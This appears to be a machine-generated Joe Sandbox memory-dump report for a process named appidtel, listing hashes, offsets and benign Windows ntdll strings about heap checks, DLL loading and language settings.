                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      • Opcode ID: 059d69b8bcca3ff7f5f4ca3cf7b7ae6d1768e776f4b2cf1995a938367b01de63
                                                      • Instruction ID: d5dd76fae695ce0f297d9cc3c0ed3d72d3c20658154e911810cf29ccfd79b349
                                                      • Opcode Fuzzy Hash: 059d69b8bcca3ff7f5f4ca3cf7b7ae6d1768e776f4b2cf1995a938367b01de63
                                                      • Instruction Fuzzy Hash: 46818FB0A20359BFDB20CF94CC45FAEBBB9BB09714F244159F518BB641D3B5A980CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                      • API String ID: 0-3591852110
                                                      • Opcode ID: 2a0eadd2ef377eecf0e002abe7ab22a010b3773617836795c6ec221981aeaf06
                                                      • Instruction ID: 46c084c8e316884cc6fde3cfb3641fc1df90c9e1f2bdc4a5f3a2f1797978c272
                                                      • Opcode Fuzzy Hash: 2a0eadd2ef377eecf0e002abe7ab22a010b3773617836795c6ec221981aeaf06
                                                      • Instruction Fuzzy Hash: 0F12CD74620642DFD725CF28C441BBAFBE5EF0A710F9884A9E5968BA41D774F8E0CB50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                      • API String ID: 0-3532704233
                                                      • Opcode ID: 1da42a3c6c5b9df6e79a86c5a56a651f05bde970409e7e9a5e060c5ccecabc03
                                                      • Instruction ID: ff8cdc0495d7e909853befd068698316ee0b7c71f0443e4a68969c63965a37e7
                                                      • Opcode Fuzzy Hash: 1da42a3c6c5b9df6e79a86c5a56a651f05bde970409e7e9a5e060c5ccecabc03
                                                      • Instruction Fuzzy Hash: 2DB1ADB15283529FDB21DF24C480B6BB7E8BF89744F05096EF999D7240D770D984CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                      • API String ID: 0-3063724069
                                                      • Opcode ID: 9b5a34e6342a58b4ad6f492d98454e1610bfc4a1951f8353424a95b0a7238d90
                                                      • Instruction ID: 6f75946a9b3938adc50254aa9dbb6bbd8638186c190c7174a9ad87caedb2bcaf
                                                      • Opcode Fuzzy Hash: 9b5a34e6342a58b4ad6f492d98454e1610bfc4a1951f8353424a95b0a7238d90
                                                      • Instruction Fuzzy Hash: 90D1E2B2829316AFD721DB54C840BAFB7ECAF84714F050929FA84AB150D7B4DDC48BD2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                      • API String ID: 0-1700792311
                                                      • Opcode ID: 29b0bec6286c4e9bb3aa33ea66b1abd48c85022f6b346da74b628d9fe00f26cf
                                                      • Instruction ID: 5826ee11843817dfbabd4ee1a3407da27d215fa9c75b0ee5116c8d47248fcb6a
                                                      • Opcode Fuzzy Hash: 29b0bec6286c4e9bb3aa33ea66b1abd48c85022f6b346da74b628d9fe00f26cf
                                                      • Instruction Fuzzy Hash: 4FD198796206869FCB12EF68C441AAEFBF1FF4A700F08C069E6559B652C7B4D9C1CB10
                                                      Strings
                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0323D146
                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0323D0CF
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0323D2C3
                                                      • @, xrefs: 0323D0FD
                                                      • @, xrefs: 0323D2AF
                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0323D262
                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0323D196
                                                      • @, xrefs: 0323D313
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                      • API String ID: 0-1356375266
                                                      • Opcode ID: 2517869e8ad7e01c4d5afb19b952211029af6d82bfa9da089567e266a1081ed1
                                                      • Instruction ID: 8c4e76c9131eb3127988f4a2d1e654e84398e7c63b0232313d1e3541e996ca07
                                                      • Opcode Fuzzy Hash: 2517869e8ad7e01c4d5afb19b952211029af6d82bfa9da089567e266a1081ed1
                                                      • Instruction Fuzzy Hash: 58A17CB19283469FE721DF24C480B9BF7E8BB85B15F00492EE59896240D7B4D988CF93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-523794902
                                                      • Opcode ID: b22558b7e55c8197482803cd9c5f0116111242bca0f96f312da9f5ad447f0c11
                                                      • Instruction ID: db5e4241843a633ea770f6268c3d064eb5f9777b637096124a2b17fddd91a7b9
                                                      • Opcode Fuzzy Hash: b22558b7e55c8197482803cd9c5f0116111242bca0f96f312da9f5ad447f0c11
                                                      • Instruction Fuzzy Hash: E342EFB5A28382EFD714DF28D580A2AB7E5FF89604F18496AE8858B241D770D9C1CB52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                      • API String ID: 0-122214566
                                                      • Opcode ID: 2a74920c39a550220f335fe8819ea43aa241e270a193b0985a6944d7d687314a
                                                      • Instruction ID: fdc0aff2de4ad78ecdc9aafd887db32e2e1bd5f00d1dbf1b61ee925ecc365653
                                                      • Opcode Fuzzy Hash: 2a74920c39a550220f335fe8819ea43aa241e270a193b0985a6944d7d687314a
                                                      • Instruction Fuzzy Hash: B6C11A31A30715ABDB24DF68C89177EBBA5AF55710F184069FC06AF280E7F48AC4C391
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-792281065
                                                      • Opcode ID: 2cbd856073fe5e8d0f7860ef6003d2dfab8f1d01b14c24cb66b678c75368e49a
                                                      • Instruction ID: aba3a97cf05d24b9c1464ad8efd72e3713291e16d10250a297ca876ec7b59d98
                                                      • Opcode Fuzzy Hash: 2cbd856073fe5e8d0f7860ef6003d2dfab8f1d01b14c24cb66b678c75368e49a
                                                      • Instruction Fuzzy Hash: 4E913934A30715EFDB24EF15E8D5BAE77B8BB01B64F048169E8106B682D7B498C1C791
                                                      Strings
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 032B219F
                                                      • RtlGetAssemblyStorageRoot, xrefs: 032B2160, 032B219A, 032B21BA
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 032B21BF
                                                      • SXS: %s() passed the empty activation context, xrefs: 032B2165
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 032B2178
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 032B2180
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      • API String ID: 0-861424205
                                                      • Opcode ID: e2fa44e76147b389d77a79ede12938ccfb9cb136c42fe47b9ef33e34fc8e1c31
                                                      • Instruction ID: a3b47532b1930fc32f8c3f2ebd7b9aef5cabe53a3d167387b499636855b7ee2e
                                                      • Opcode Fuzzy Hash: e2fa44e76147b389d77a79ede12938ccfb9cb136c42fe47b9ef33e34fc8e1c31
                                                      • Instruction Fuzzy Hash: 10312836E70325FBE721CA598D45F9FBA78EB54F90F090459FA046B202D2B0DAC1C3A1
                                                      Strings
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 032B81E5
                                                      • LdrpInitializeImportRedirection, xrefs: 032B8177, 032B81EB
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0327C6C3
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 032B8181, 032B81F5
                                                      • LdrpInitializeProcess, xrefs: 0327C6C4
                                                      • Loading import redirection DLL: '%wZ', xrefs: 032B8170
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-475462383
                                                      • Opcode ID: bcc8490951e14a4ee643904078bf6763cff29eb63ecd10e8ea39d2e12c8e13eb
                                                      • Instruction ID: 270ebe5dd155ffd1a821ba62d34b20547b66d0696b680916ab02c90ba9b23d04
                                                      • Opcode Fuzzy Hash: bcc8490951e14a4ee643904078bf6763cff29eb63ecd10e8ea39d2e12c8e13eb
                                                      • Instruction Fuzzy Hash: 03312975664351AFC210FF29DD85E6AB7E8EFC4B10F044558F844AF291D660EC84CBA2
                                                      Strings
                                                      • Kernel-MUI-Number-Allowed, xrefs: 03265247
                                                      • WindowsExcludedProcs, xrefs: 0326522A
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 03265352
                                                      • Kernel-MUI-Language-Allowed, xrefs: 0326527B
                                                      • Kernel-MUI-Language-SKU, xrefs: 0326542B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: 4ce5f6bee2aeaa92fbe47222ba1fde9e3f2ed6897014fe2c64abbacee75d22bd
                                                      • Instruction ID: 126e95cc793055be3ed84a08eb35d06852c40a73c48cab4f3a80477c902ad05d
                                                      • Opcode Fuzzy Hash: 4ce5f6bee2aeaa92fbe47222ba1fde9e3f2ed6897014fe2c64abbacee75d22bd
                                                      • Instruction Fuzzy Hash: 32F15D76D21619EFCB11DF98C980EEEBBF9FF49650F24005AE501AB210D7B49E81CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1975516107
                                                      • Opcode ID: 243a056ac31566eb0209db404b1521540075ae511f70680e3a65805ee1022ec9
                                                      • Instruction ID: a0c1ab9474a47ea6d45c3dfa79f19db17ba847b8998f32de765b0e321cc33651
                                                      • Opcode Fuzzy Hash: 243a056ac31566eb0209db404b1521540075ae511f70680e3a65805ee1022ec9
                                                      • Instruction Fuzzy Hash: 0A51CF75B2434ADFDB14EFA8D5887ADBBB1BF48314F188159D8016B291D7B4A9C2CBC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                      • API String ID: 0-3061284088
                                                      • Opcode ID: e88d5ab3f677b257af8da6bb32a5dd976fe7b46cf838bcb9254f10530ad3104c
                                                      • Instruction ID: 6c3bda26aece821bab788ff260386f60af8cb0b7854ce69bd54ead98c482d6a4
                                                      • Opcode Fuzzy Hash: e88d5ab3f677b257af8da6bb32a5dd976fe7b46cf838bcb9254f10530ad3104c
                                                      • Instruction Fuzzy Hash: 5101FC77179341DEE225E71DE55AF66B7D4DB83B30F2A405AF0244BE51CAE4D8C0C660
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      • API String ID: 0-3178619729
                                                      • Opcode ID: f07cd6deca654c0db0c72c99b07f9246f92bdf52b3c1b5eb2334b7bd6fd479e3
                                                      • Instruction ID: 8c5ff0787c6a3dd141a928b6aa6be5427b1f51775475533f667de5f64121c8ce
                                                      • Opcode Fuzzy Hash: f07cd6deca654c0db0c72c99b07f9246f92bdf52b3c1b5eb2334b7bd6fd479e3
                                                      • Instruction Fuzzy Hash: 0813A174A20256DFDB24CF68C4907A9FBF1FF49304F188199E855AB381D7B4AA85CF90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-3570731704
                                                      • Opcode ID: 922d5a13ab1a17c1266ccf045a7968f63b4fd2a6ba7d5a06aac8807185d553e7
                                                      • Instruction ID: 2d25b532f26dfbe922e5446f158beb908c1bc9213b18ca8d137913b0fa447491
                                                      • Opcode Fuzzy Hash: 922d5a13ab1a17c1266ccf045a7968f63b4fd2a6ba7d5a06aac8807185d553e7
                                                      • Instruction Fuzzy Hash: A1926C75A21729CFEB24CF18C880BA9B7B5BF45310F1981E9E949AB250D770AEC0CF51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      • API String ID: 0-379654539
                                                      • Opcode ID: 92b5d8c06fda8f85c1d220e3975a62c95a1ccde282e8e46b939719d3cd6c38c8
                                                      • Instruction ID: 3c75ba6aaec145635b9ce39d6635d4238e55c27dab41f891172efd0524746298
                                                      • Opcode Fuzzy Hash: 92b5d8c06fda8f85c1d220e3975a62c95a1ccde282e8e46b939719d3cd6c38c8
                                                      • Instruction Fuzzy Hash: 06C1AD75568782CFD729CF18C144B6AB7F4FF84704F04496AF8968B290E774C989CB52
                                                      Strings
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 032B21D9, 032B22B1
                                                      • .Local, xrefs: 032728D8
                                                      • SXS: %s() passed the empty activation context, xrefs: 032B21DE
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 032B22B6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      • API String ID: 0-1239276146
                                                      • Opcode ID: ef2dda43023ad2d73605ee21529a9d76ed6e6acb1ea0b381ba9f2235d3f7d2d5
                                                      • Instruction ID: 3a6114c411ee9ca13d54fa7e0428cf8561020848e8d064b0f1976e7cf582777d
                                                      • Opcode Fuzzy Hash: ef2dda43023ad2d73605ee21529a9d76ed6e6acb1ea0b381ba9f2235d3f7d2d5
                                                      • Instruction Fuzzy Hash: C1A18E3592132ADBCB24CF64D884BA9B3B5BF58314F2949E9D848AB251D7709EC1CF90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                      • API String ID: 0-2586055223
                                                      • Opcode ID: abfec142d0ccb9282896140cc6ef182369cb05951e12300764cbff79d93256a3
                                                      • Instruction ID: 633c0b05431a16ea8df78eab5a5726b1da0e1a27b0740425b3c2922cedaed68b
                                                      • Opcode Fuzzy Hash: abfec142d0ccb9282896140cc6ef182369cb05951e12300764cbff79d93256a3
                                                      • Instruction Fuzzy Hash: 20613476225341EFEB11DB24DA44F27B7E8FF81710F090869F9658B291D7B4D980CB61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                      • API String ID: 0-336120773
                                                      • Opcode ID: 5802707b19e61c82d2c3877db070bc0c3fc491f1dd8627f2c1eeb0d10ca9c686
                                                      • Instruction ID: ff194a2c72a1e9d4b31e7d75fb53740cdb8d9ccecc0d633d87abb265374b92c9
                                                      • Opcode Fuzzy Hash: 5802707b19e61c82d2c3877db070bc0c3fc491f1dd8627f2c1eeb0d10ca9c686
                                                      • Instruction Fuzzy Hash: 7A310336230224EFD710DBD8C986F6AF3E8EF06620F590465E601CB691D6B0F8E0CB55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                      • API String ID: 0-1391187441
                                                      • Opcode ID: 9576c93c0a74c9897572d33527ea89694fd46bb67dbfb254d5961a135882a6ce
                                                      • Instruction ID: 77a20ae914f23d8bf6f97ee09d20243169d09b114218fa3ff8698d3c46b2b173
                                                      • Opcode Fuzzy Hash: 9576c93c0a74c9897572d33527ea89694fd46bb67dbfb254d5961a135882a6ce
                                                      • Instruction Fuzzy Hash: AA31B476620215EFDB01DB49C885FAEBBF8EF46B20F154456E814AB291D7B0EDC0CA60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: 69a8d12787260eba548691313d256ac35e98ee863b8f5282673c6627a0f0d84e
                                                      • Instruction ID: 5c3c166c468a1f5e53289c4b9afd791ee8c74189e9fe20df9a28267fccefac25
                                                      • Opcode Fuzzy Hash: 69a8d12787260eba548691313d256ac35e98ee863b8f5282673c6627a0f0d84e
                                                      • Instruction Fuzzy Hash: C7F1AE74A20A06DFDB14CF68C894B6AB7F5FF45700F2481A8E8569B385D774EAC1CB50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                      • API String ID: 0-2391371766
                                                      • Opcode ID: f9df114f77a9a94a2dc20bd59f9df5cf3afe9b13a19290576671922637cd1f8e
                                                      • Instruction ID: f22df20867e23454780d97dfe517cd5e9cc563d1fba3da432e553f28945c444b
                                                      • Opcode Fuzzy Hash: f9df114f77a9a94a2dc20bd59f9df5cf3afe9b13a19290576671922637cd1f8e
                                                      • Instruction Fuzzy Hash: 98B1A279635782AFD311EF54C881B5BB7E8BB44714F048E2DFA409B280D7B8E894CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      • Opcode ID: e0764d46017ae4bb16f3484ee53fc8fa9960db66fd02077d6981899121b4155f
                                                      • Instruction ID: 818136c1d6252013f104226582937d7e496255ecfab3f9f05fcf86ec1a281f66
                                                      • Opcode Fuzzy Hash: e0764d46017ae4bb16f3484ee53fc8fa9960db66fd02077d6981899121b4155f
                                                      • Instruction Fuzzy Hash: 42A16E759212299BDF31DF24CC88BAAB7B8EF48710F1401EAE909AB250D7759EC4CF54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                      • API String ID: 0-318774311
                                                      • Opcode ID: 2e51a32278729a1945e6208ed291ff5e9bc84cc8556abf8e8262ffe68e304495
                                                      • Instruction ID: 5a875afc42832276995923b7a4db54eece2d37db9091d697b6a1a65389514fde
                                                      • Opcode Fuzzy Hash: 2e51a32278729a1945e6208ed291ff5e9bc84cc8556abf8e8262ffe68e304495
                                                      • Instruction Fuzzy Hash: CE818AB9629741AFE311DB14C844B6AB7E8FF85750F080929FA81DB390D7B4D984CB62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$&$@
                                                      • API String ID: 0-1537733988
                                                      • Opcode ID: 5157107d2db19ede0b4bf1418dee168b993bb3b6d28ace5c51d8c84337317d39
                                                      • Instruction ID: 61a8316f558fd9962febc790c39c1f6d4014caa5f77523581fe2c3ea4c5f9e84
                                                      • Opcode Fuzzy Hash: 5157107d2db19ede0b4bf1418dee168b993bb3b6d28ace5c51d8c84337317d39
                                                      • Instruction Fuzzy Hash: C571E2745283029FC714EF24C580A6BFBEAFF85758F24891DE4968B290D771D8C5CB92
                                                      Strings
                                                      • TargetNtPath, xrefs: 0331B82F
                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0331B82A
                                                      • GlobalizationUserSettings, xrefs: 0331B834
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                      • API String ID: 0-505981995
                                                      • Opcode ID: a6d23c1dc74b319b25ae7e26bebaa15ffd47e85fa5e5cec929c4cde8f221547e
